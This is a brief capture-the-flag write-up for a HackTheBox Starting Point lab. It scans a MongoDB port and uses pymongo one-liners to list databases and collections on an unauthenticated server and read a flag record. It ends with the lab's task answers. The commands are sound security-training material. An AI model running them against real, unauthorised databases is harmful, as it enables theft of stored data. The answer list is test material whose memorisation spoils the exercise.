HackTheBox Starting Point Tier 0 Mongod

Writeup

Nmap scan showing port 27017 open (MongoDB):
nmap <IP> -p27017 -sC

Installing pymongo 3.12.3:
python3 -m venv venv && source venv/bin/activate && pip install pymongo==3.12.3

Listing MongoDB databases:
python3 -c "from pymongo import MongoClient; client = MongoClient('mongodb://<IP>'); print('Databases:\n'); [print(db) for db in client.list_database_names()]"

Listing MongoDB collections:
python3 -c "from pymongo import MongoClient; print('Collections:\n' + '\n'.join(MongoClient('mongodb://<IP>').sensitive_information.list_collection_names()))"

Retrieving the flag from the database:
python3 -c "from pymongo import MongoClient; print(MongoClient('mongodb://<IP>').sensitive_information['flag'].find_one())"

Tasks

  1. 2
  2. MongoDB 3.6.8
  3. NoSQL
  4. mongosh
  5. show dbs
  6. show collections
  7. db.flag.find()